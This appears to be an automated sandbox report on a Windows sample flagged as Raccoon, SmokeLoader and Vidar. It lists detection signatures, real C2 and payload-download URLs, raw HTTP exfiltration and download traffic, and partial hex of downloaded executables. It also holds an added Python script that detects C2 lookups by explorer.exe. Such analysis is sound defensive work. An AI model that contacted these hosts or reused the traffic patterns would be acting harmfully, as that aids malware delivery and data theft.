Windows Analysis Report SkB6zJ6H3N.exe

Overview

General Information

Sample Name: SkB6zJ6H3N.exe
Analysis ID: 511734
MD5: b8d2d644a3ac5df8af9b3aff803f3347
SHA1: 062e29d59604956a4cffd64fc81cd1c3f72b0ff3
SHA256: c3f8d6b3e497471cc5e1526d59f7068f0655704f98dca59d79a77b81f1cb7fd5
Tags: exe, RedLineStealer

Detection

Raccoon, SmokeLoader, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected AntiVM3
Yara detected Vidar
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Yara detected Raccoon Stealer
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Found malware configuration
DLL reload attack detected
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Maps a DLL or memory area into another process
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Contains functionality to inject code into remote processes
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Adds a directory exclusion to Windows Defender
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Renames NTDLL to bypass HIPS
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Sigma detected: Powershell Defender Exclusion
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Uses insecure TLS / SSL version for HTTPS connection
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Classification chart (image not reproduced). Categories scored: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner. Verdict scale: clean, suspicious, malicious.

AV Detection:

Yara detected Raccoon Stealer
Source: Yara match File source: 36.3.32BC.exe.48a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.3.32BC.exe.48a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000024.00000003.442845982.00000000048A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 32BC.exe PID: 5540, type: MEMORYSTR
Antivirus detection for URL or domain
Source: http://sysaheu90.top/game.exe Avira URL Cloud: Label: malware
Source: http://znpst.top/dl/buildz.exe Avira URL Cloud: Label: malware
Source: http://privacytoolzforyou-6000.top/downloads/toolspab2.exe Avira URL Cloud: Label: malware
Source: http://toptelete.top/agrybirdsgamerept Avira URL Cloud: Label: malware
Source: http://xacokuo8.top/ Avira URL Cloud: Label: malware
Source: http://hajezey1.top/ Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000014.00000002.368853755.00000000004A0000.00000004.00000001.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://xacokuo8.top/", "http://hajezey1.top/"]}
Multi AV Scanner detection for domain / URL
Source: privacytoolzforyou-6000.top Virustotal: Detection: 5%
Source: iyc.jelikob.ru Virustotal: Detection: 12%
Source: mas.to Virustotal: Detection: 6%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\192F.exe ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\319A.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\6DDE.exe ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Temp\75B0.exe ReversingLabs: Detection: 54%
Source: C:\Users\user\AppData\Local\Temp\86B8.exe ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\8746.exe ReversingLabs: Detection: 32%
Machine Learning detection for sample
Source: SkB6zJ6H3N.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6DDE.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\7428.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\cviueca Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\32BC.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8746.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\75B0.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\319A.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\89D7.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\eviueca Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\sfiueca Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8E8B.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\192F.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 21.0.cviueca.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 21.0.cviueca.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 21.0.cviueca.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 21.0.cviueca.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Compliance:

Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.7:49829 version: TLS 1.0
Uses 32bit PE files
Source: SkB6zJ6H3N.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\AppData\Local\Temp\192F.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Uses TLS 1.2 for HTTPS connections
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.7:49782 version: TLS 1.2
Source: unknown HTTPS traffic detected: 81.177.141.36:443 -> 192.168.2.7:49797 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.7:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.7:49850 version: TLS 1.2
Binary contains paths to debug symbols (PDB)
Source: Binary string: C:\vojos\fuw.pdb source: 192F.exe, 0000001D.00000000.392199023.0000000000417000.00000002.00020000.sdmp, sfiueca.7.dr
Source: Binary string: C:\kelut\takemiv\botuw31-mejosek-li.pdb source: 69B5.exe, 69B5.exe.7.dr
Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdbp source: 8E8B.exe.7.dr
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000020.00000000.407285900.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000002.433249054.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002A.00000000.454048622.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.31.dr
Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdb source: 8E8B.exe.7.dr
Source: Binary string: C:\moliyuwod_vofadarecayu\dezuvacux.pdb source: SkB6zJ6H3N.exe
Source: Binary string: cC:\moliyuwod_vofadarecayu\dezuvacux.pdb` source: SkB6zJ6H3N.exe
Source: Binary string: C:\lewusukoviv.pdb source: 7428.exe.7.dr
Source: Binary string: wntdll.pdbUGP source: 192F.exe, 0000001D.00000002.423561316.000000006A8F1000.00000020.00020000.sdmp, 1105.tmp.29.dr
Source: Binary string: wntdll.pdb source: 192F.exe, 1105.tmp.29.dr
Source: Binary string: XC:\meyobiti_bigenubixa\zicax4_tupewacuz\mepuyajuyen.pdb` source: 32BC.exe.7.dr
Source: Binary string: WC:\kelut\takemiv\botuw31-mejosek-li.pdb` source: 69B5.exe, 00000021.00000000.408654637.0000000000401000.00000020.00020000.sdmp, 69B5.exe.7.dr
Source: Binary string: C:\lewusukoviv.pdb` source: 7428.exe.7.dr
Source: Binary string: C:\tosofom\yopuk.pdb source: 75B0.exe.7.dr
Source: Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb` source: 6DDE.exe.7.dr
Source: Binary string: C:\meyobiti_bigenubixa\zicax4_tupewacuz\mepuyajuyen.pdb source: 32BC.exe.7.dr
Source: Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb source: 6DDE.exe.7.dr

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.7:49841 -> 194.180.174.181:80
Source: Traffic Snort IDS: 2033973 ET TROJAN Win32.Raccoon Stealer CnC Activity (dependency download) 192.168.2.7:49863 -> 194.180.174.181:80
Source: Traffic Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.7:49863 -> 194.180.174.181:80
Source: Traffic Snort IDS: 2033974 ET TROJAN Win32.Raccoon Stealer Data Exfil Attempt 192.168.2.7:49841 -> 194.180.174.181:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: iyc.jelikob.ru
Source: C:\Windows\explorer.exe Domain query: xacokuo8.top
Source: C:\Windows\explorer.exe Domain query: znpst.top
Source: C:\Windows\explorer.exe Network Connect: 216.128.137.31 80
Source: C:\Windows\explorer.exe Domain query: nusurtal4f.net
Source: C:\Windows\explorer.exe Domain query: privacytoolzforyou-6000.top
Source: C:\Windows\explorer.exe Domain query: hajezey1.top
Source: C:\Windows\explorer.exe Domain query: sysaheu90.top
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://xacokuo8.top/
Source: Malware configuration extractor URLs: http://hajezey1.top/
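Two findings above reinforce each other: the configuration extractor recovered the SmokeLoader C2 list (http://xacokuo8.top/ and http://hajezey1.top/) from injected memory, and the DNS queries for exactly those hosts come from C:\Windows\explorer.exe, a process the report itself flags as a likely injection target. The Python below is an added example, not part of the report, that runs this correlation over Sysmon Event ID 22 style DNS records constructed from the "Domain query" lines above. The event layout, the set of processes treated as system processes, and the allowlist of names explorer.exe may legitimately resolve are my assumptions; the final two events are constructed controls.

```python
from urllib.parse import urlparse

# C2 list exactly as the configuration extractor printed it for SmokeLoader.
SMOKELOADER_C2 = ["http://xacokuo8.top/", "http://hajezey1.top/"]

# Processes that should not resolve arbitrary external names on their own;
# a DNS query from one of them is what the "System process connects to
# network" finding captures. Assumed set: explorer.exe is the case on this page.
SYSTEM_PROCESSES = {r"c:\windows\explorer.exe"}

# Names explorer.exe does resolve in normal use (assumed allowlist; tune per estate).
ALLOWED_SUFFIXES = (".microsoft.com", ".msftconnecttest.com", ".windows.com")

# Sysmon Event ID 22 style records constructed from the "Domain query" lines
# above. The last two are constructed controls: a benign lookup by explorer.exe
# and the same C2 name resolved by a browser instead of a system process.
DNS_EVENTS = [
    {"image": r"C:\Windows\explorer.exe", "query": "iyc.jelikob.ru"},
    {"image": r"C:\Windows\explorer.exe", "query": "xacokuo8.top"},
    {"image": r"C:\Windows\explorer.exe", "query": "znpst.top"},
    {"image": r"C:\Windows\explorer.exe", "query": "nusurtal4f.net"},
    {"image": r"C:\Windows\explorer.exe", "query": "privacytoolzforyou-6000.top"},
    {"image": r"C:\Windows\explorer.exe", "query": "hajezey1.top"},
    {"image": r"C:\Windows\explorer.exe", "query": "sysaheu90.top"},
    {"image": r"C:\Windows\explorer.exe", "query": "www.msftconnecttest.com"},
    {"image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "query": "xacokuo8.top"},
]


def c2_hosts(urls):
    """Reduce the extractor's URL list to lower-cased host names."""
    return {urlparse(u).hostname.lower() for u in urls}


def score_dns_event(event, c2):
    """Return (reasons, severity) for one DNS record.

    Both reasons together (system process AND known C2 name) are the strong
    signal; either alone is worth a look but has benign explanations.
    """
    image = event["image"].lower()
    query = event["query"].lower().rstrip(".")
    reasons = []
    if image in SYSTEM_PROCESSES and not query.endswith(ALLOWED_SUFFIXES):
        reasons.append("system-process-dns")
    if query in c2:
        reasons.append("known-c2-host")
    severity = {2: "high", 1: "medium"}.get(len(reasons), "none")
    return reasons, severity


def hunt(events, c2_urls):
    """Run the correlation over a batch of DNS events and keep the hits."""
    c2 = c2_hosts(c2_urls)
    findings = []
    for ev in events:
        reasons, severity = score_dns_event(ev, c2)
        if reasons:
            findings.append({"image": ev["image"].lower(), "query": ev["query"].lower(),
                             "reasons": reasons, "severity": severity})
    return findings


if __name__ == "__main__":
    for f in hunt(DNS_EVENTS, SMOKELOADER_C2):
        print(f"{f['severity']:6s} {f['image']:45s} {f['query']:30s} {f['reasons']}")
```

On the events above this yields eight findings: the two C2 lookups from explorer.exe score high, the other five explorer.exe lookups score medium on the system-process rule alone, the browser's lookup of xacokuo8.top scores medium on the C2 rule alone, and the msftconnecttest.com lookup is suppressed by the allowlist. In practice the medium tier is where the remaining hosts on this page (znpst.top, sysaheu90.top, privacytoolzforyou-6000.top) would be triaged as additional download locations rather than configured C2.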
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Host: toptelete.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Content-Length: 132 | Host: 194.180.174.181
Source: global traffic HTTP traffic detected: GET //l/f/9Z2CynwB3dP17SpzOnMI/9f3868956801fb92fa090557a1edc6020dc838a9 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 194.180.174.181
Source: global traffic HTTP traffic detected: GET //l/f/9Z2CynwB3dP17SpzOnMI/7af57f772c6107cc1c44807ee6e54627588ad2f9 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 194.180.174.181
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV | Content-Length: 1410 | Host: 194.180.174.181
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: text/plain; charset=UTF-8 | Content-Length: 132 | Host: 194.180.174.181
Source: global traffic HTTP traffic detected: GET //l/f/_51AzHwB3dP17SpzL5Xz/3c5ef2028f9a45f85119eb6cb39f21b264b252bf HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 194.180.174.181
Source: global traffic HTTP traffic detected: GET //l/f/_51AzHwB3dP17SpzL5Xz/3fa38023efb6f7516e4aff23353cd7c666085597 HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: 194.180.174.181
Source: global traffic HTTP traffic detected: POST / HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: multipart/form-data, boundary=vD2tL1qC9bC3zV9eD9yX8dU8yY8lC1cV | Content-Length: 1398 | Host: 194.180.174.181
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 13:29:51 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 13:29:02 GMTETag: "54600-5cf7dcf7c6721"Accept-Ranges: bytesContent-Length: 345600Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b5 ed f7 3e f1 8c 99 6d f1 8c 99 6d f1 8c 99 6d 9e fa 32 6d dd 8c 99 6d 9e fa 07 6d d3 8c 99 6d 9e fa 33 6d 71 8c 99 6d f8 f4 0a 6d f8 8c 99 6d f1 8c 98 6d 8f 8c 99 6d 9e fa 36 6d f0 8c 99 6d 9e fa 03 6d f0 8c 99 6d 9e fa 04 6d f0 8c 99 6d 52 69 63 68 f1 8c 99 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 83 0c 03 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 c8 03 00 00 c0 70 02 00 00 00 00 70 c7 01 00 00 10 00 00 00 e0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 d0 74 02 00 04 00 00 b8 a1 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 34 cc 03 00 64 00 00 00 00 60 73 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 73 02 88 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 bb 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 68 c7 03 00 00 10 00 00 00 c8 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 e0 03 00 00 16 00 00 00 cc 03 00 00 00 00 00 00 00 
00 00 00 00 00 00 40 00 00 c0 2e 78 65 6d 75 00 00 00 e5 02 00 00 00 50 73 02 00 04 00 00 00 e2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 3c 00 00 00 60 73 02 00 3c 00 00 00 e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 01 00 00 a0 73 02 00 24 01 00 00 22 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 29 Oct 2021 13:30:25 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38Last-Modified: Fri, 29 Oct 2021 13:30:02 GMTETag: "93000-5cf7dd3163f4f"Accept-Ranges: bytesContent-Length: 602112Connection: closeContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b5 ed f7 3e f1 8c 99 6d f1 8c 99 6d f1 8c 99 6d 9e fa 32 6d dd 8c 99 6d 9e fa 07 6d d3 8c 99 6d 9e fa 33 6d 71 8c 99 6d f8 f4 0a 6d f8 8c 99 6d f1 8c 98 6d 8f 8c 99 6d 9e fa 36 6d f0 8c 99 6d 9e fa 03 6d f0 8c 99 6d 9e fa 04 6d f0 8c 99 6d 52 69 63 68 f1 8c 99 6d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 44 2c a1 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 b2 07 00 00 c0 70 02 00 00 00 00 80 b1 05 00 00 10 00 00 00 d0 07 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 78 02 00 04 00 00 40 ca 09 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 44 b6 07 00 64 00 00 00 00 50 77 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 77 02 88 1b 00 00 30 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a6 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 dc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 78 b1 07 00 00 10 00 00 00 b2 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 69 6f 02 00 d0 07 00 00 16 00 00 00 b6 07 00 00 00 00 00 00 00 
00 00 00 00 00 00 40 00 00 c0 2e 6d 61 6c 61 6a 65 77 e5 02 00 00 00 40 77 02 00 04 00 00 00 cc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 00 3c 00 00 00 50 77 02 00 3c 00 00 00 d0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 01 00 00 90 77 02 00 24 01 00 00 0c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 13:30:59 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 
00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 